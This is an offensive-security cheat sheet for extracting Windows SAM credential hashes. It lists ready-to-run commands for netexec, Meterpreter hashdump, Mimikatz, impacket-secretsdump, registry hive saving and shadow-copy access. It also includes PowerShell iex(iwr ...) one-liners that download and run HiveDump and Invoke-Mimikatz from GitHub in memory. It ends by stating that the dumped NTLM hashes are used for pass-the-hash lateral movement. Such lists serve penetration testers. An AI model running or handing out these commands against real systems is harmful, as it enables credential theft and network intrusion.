Extract Credentials from SAM

Tools: CrackMapExec/Netexec , Meterpreter , Mimikatz , impacket-secretsdump , reg.py , vss shadow copies

1) CrackMapExec/Netexec

netexec smb IP_RANGE -u USER -p 'PASSWORD --sam

2) Meterpreter

hashdump

3) Mimikatz

mimikatz "privilege::debug" "lsadump::sam" "exit"

4) Secretsdump

impacket-secretsdump DOMAIN/USER:PASSWORD@IP

5) Reg.py

reg.py DOMAIN/USER:PASSWORD@IP backup -o '\\SMB_IP\share'

impacket-secretsdump -security SECURITY_FILE -system SYSTEM_FILE LOCAL

6) Shadow Copies (vss)

diskshadow list shadows all

mklink /d c:\shadowcopy \\?\GLOBALROOT\Device\Harddisk VolumeShadowCopy1\

7) SAM , SYSTEM and SECURITY hives backup copies

reg save HKLM\SAM SAM_COPY

reg save HKLM\SECURITY SECURITY_COPY

reg save HKLM\SYSTEM SYSTEM_FILE

impacket-secretsdump -system SYSTEM -sam SAM LOCAL

8) HiveDump

Load into memory

iex (iwr -UseBasicParsing https://raw.githubusercontent.com/tmenochet/PowerDump/master/HiveDump.ps1)

Dump

Invoke-HiveDump

9) Mimikatz

Load into memory

IEX (IWR -UseBasicParsing "https://raw.githubusercontent.com/BC-SECURITY/Empire/master/empire/server/data/module_source/credentials/Invoke-Mimikatz.ps1")

Dump from SAM and SYSTEM. Ensure files are in the current working directory

Invoke-Mimikatz -command "lsadump::sam /system:SYSTEM /sam:SAM"

Dump against the live hive files

Invoke-Mimikatz -Command '"token::elevate" "lsadump::sam"'

With dumping the SAM hive, we dump NTLM hashes to perform Pass-the-Hash attacks (Lateral Movement)